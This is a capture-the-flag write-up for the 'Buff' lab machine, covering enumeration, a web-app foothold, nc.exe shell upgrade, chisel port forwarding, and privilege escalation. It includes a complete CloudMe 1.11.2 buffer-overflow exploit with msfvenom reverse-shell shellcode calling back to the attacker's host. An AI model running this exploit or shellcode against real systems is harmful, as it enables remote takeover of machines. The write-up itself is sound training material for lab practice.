Enumeration
nmap scan
1
2
3
4
5
6
7
8
9
10
11
$ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Buff-full-port-scan.txt 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.18s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Port 8080 (HTTP)
Visiting port 8080 shows us a web page about fitness.
The /contact.php page discloses that Gym Management Software is being used.
Using searchsploit we identified a potential exploit.
Foothold
The exploit mimics a shell and allows us to send remote command.
We can upgrade our shell to a more stable shell by uploading nc.exe and executing it:
1
2
3
4
5
6
$ locate nc.exe
/opt/SecLists/Web-Shells/FuzzDB/nc.exe
/usr/share/seclists/Web-Shells/FuzzDB/nc.exe
/usr/share/sqlninja/apps/nc.exe
/usr/share/windows-resources/binaries/nc.exe
$ cp /usr/share/windows-resources/binaries/nc.exe .
Privesc
Using winPEAS we can see that there is an app called CloudMe which is running on local port 8888 but is not running on remote port.
Plus, if we look at C:\Users\shaun\Downloads\, we can find a binary file called CloudMe_1112.exe:
1
2
3
4
5
6
7
8
9
10
PS C:\Users\shaun\Downloads> dir
dir
Directory: C:\Users\shaun\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 16/06/2020 16:26 17830824 CloudMe_1112.exe
In order to transfer it to our local machine, we can take advantage of the current web server:
C:\Users\shaun\Downloads>copy CloudMe_1112.exe C:\xampp\htdocs\gym\
copy CloudMe_1112.exe C:\xampp\htdocs\gym\
1 file(s) copied.
Note: following Stack-Based Buffer Overflows on Windows x86 course on Academy will guide you on writing an exploit for this program.
Port forwarding with chisel
CloudMe is listening only on localhost.
If we want to make this port available to our machine, we can use a SOCKS proxy such as Chisel. Go to the release page and download the last executables for windows and linux amd64.
First, on our Kali machine, we have to set up the Chisel server, listening on any port (here 9999):
1 2 3 4
$ /chisel_1.7.6_linux_amd64 server -p 9999 --reverse 2021/09/07 00:09:35 server: Reverse tunnelling enabled 2021/09/07 00:09:35 server: Fingerprint EFwUZIpNMK9gCrrI3aubBlSlDShKhEzk0ophq0C08S4= 2021/09/07 00:09:35 server: Listening on http://0.0.0.0:9999
Then, on the target machine, tunel the port 8888 to our machine:
C:\>.\chisel.exe client 10.10.14.12:9999 R:8888:127.0.0.1:8888 .\chisel.exe client 10.10.14.12:9999 R:8888:127.0.0.1:8888 2021/09/06 23:17:24 client: Connecting to ws://10.10.14.12:9999 2021/09/06 23:17:26 client: Connected (Latency 188.0315ms)
Exploitation
Looking for CloudMe with searchsploit, we can find multiple exploits:
The first one will worked just fine but we have to replace the shellcode. msfvenom can help us to do that:
1
$ msfvenom -p windows/shell_reverse_tcp LHOST=$(vpnip) LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python --var-name payload
Then we can edit the exploit source file as follows:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
import sys
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
# msfvenom -p windows/shell_reverse_tcp LHOST=$(vpnip) LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python --var-name payload
payload = b""
payload += b"\xb8\x45\x01\x16\x38\xd9\xed\xd9\x74\x24\xf4\x5f"
payload += b"\x33\xc9\xb1\x52\x83\xef\xfc\x31\x47\x0e\x03\x02"
payload += b"\x0f\xf4\xcd\x70\xe7\x7a\x2d\x88\xf8\x1a\xa7\x6d"
payload += b"\xc9\x1a\xd3\xe6\x7a\xab\x97\xaa\x76\x40\xf5\x5e"
payload += b"\x0c\x24\xd2\x51\xa5\x83\x04\x5c\x36\xbf\x75\xff"
payload += b"\xb4\xc2\xa9\xdf\x85\x0c\xbc\x1e\xc1\x71\x4d\x72"
payload += b"\x9a\xfe\xe0\x62\xaf\x4b\x39\x09\xe3\x5a\x39\xee"
payload += b"\xb4\x5d\x68\xa1\xcf\x07\xaa\x40\x03\x3c\xe3\x5a"
payload += b"\x40\x79\xbd\xd1\xb2\xf5\x3c\x33\x8b\xf6\x93\x7a"
payload += b"\x23\x05\xed\xbb\x84\xf6\x98\xb5\xf6\x8b\x9a\x02"
payload += b"\x84\x57\x2e\x90\x2e\x13\x88\x7c\xce\xf0\x4f\xf7"
payload += b"\xdc\xbd\x04\x5f\xc1\x40\xc8\xd4\xfd\xc9\xef\x3a"
payload += b"\x74\x89\xcb\x9e\xdc\x49\x75\x87\xb8\x3c\x8a\xd7"
payload += b"\x62\xe0\x2e\x9c\x8f\xf5\x42\xff\xc7\x3a\x6f\xff"
payload += b"\x17\x55\xf8\x8c\x25\xfa\x52\x1a\x06\x73\x7d\xdd"
payload += b"\x69\xae\x39\x71\x94\x51\x3a\x58\x53\x05\x6a\xf2"
payload += b"\x72\x26\xe1\x02\x7a\xf3\xa6\x52\xd4\xac\x06\x02"
payload += b"\x94\x1c\xef\x48\x1b\x42\x0f\x73\xf1\xeb\xba\x8e"
payload += b"\x92\x19\x31\x9e\x6e\x76\x47\x9e\x7f\xda\xce\x78"
payload += b"\x15\xf2\x86\xd3\x82\x6b\x83\xaf\x33\x73\x19\xca"
payload += b"\x74\xff\xae\x2b\x3a\x08\xda\x3f\xab\xf8\x91\x1d"
payload += b"\x7a\x06\x0c\x09\xe0\x95\xcb\xc9\x6f\x86\x43\x9e"
payload += b"\x38\x78\x9a\x4a\xd5\x23\x34\x68\x24\xb5\x7f\x28"
payload += b"\xf3\x06\x81\xb1\x76\x32\xa5\xa1\x4e\xbb\xe1\x95"
payload += b"\x1e\xea\xbf\x43\xd9\x44\x0e\x3d\xb3\x3b\xd8\xa9"
payload += b"\x42\x70\xdb\xaf\x4a\x5d\xad\x4f\xfa\x08\xe8\x70"
payload += b"\x33\xdd\xfc\x09\x29\x7d\x02\xc0\xe9\x9d\xe1\xc0"
payload += b"\x07\x36\xbc\x81\xa5\x5b\x3f\x7c\xe9\x65\xbc\x74"
payload += b"\x92\x91\xdc\xfd\x97\xde\x5a\xee\xe5\x4f\x0f\x10"
payload += b"\x59\x6f\x1a"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
print(sys.exc_value)
We forwarded the port 8888 of the target on ou port 8888, now we just have to run the exploit:
